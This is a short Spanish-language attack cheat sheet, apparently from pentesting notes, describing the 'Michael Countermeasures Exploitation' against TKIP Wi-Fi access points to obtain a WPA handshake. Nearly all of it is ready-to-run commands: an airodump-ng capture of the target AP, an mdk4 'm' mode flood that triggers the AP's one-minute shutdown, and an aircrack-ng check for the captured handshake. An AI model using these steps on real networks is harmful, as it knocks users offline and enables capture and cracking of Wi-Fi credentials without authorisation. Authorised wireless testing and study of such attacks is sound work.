Michael Countermeasures Exploitation

Ataque usado para la obtención de handshake. Se ejecuta sobre APs que usan protocolo de seguridad TKIP, los que reaccionan cerrando la red por un minuto tras detectar numerosos errores de integridad.


  • Capturar tráfico con Airodump-ng

sudo airodump-ng --write traffic_file --bssid <MAC_AP> --channel <channel_AP> <wifi_interface>
  • En paralelo, ejecutar ataque Michael Countermeasures Exploitation con MKD4 sobre APs que utilicen el protocolo de seguridad TKIP.

mdk4 <wifi_interface> m -t <BSSID_AP_TARGET> -s <number> -w <number>

-t <BSSID_AP_TARGET>
-s <speed_packet_per_second>
-w <wait_second_between_send_packets>
  • Analizar presencia de handshake con Aircrack-ng en captura de tráfico

sudo aircrack-ng traffic_file.cap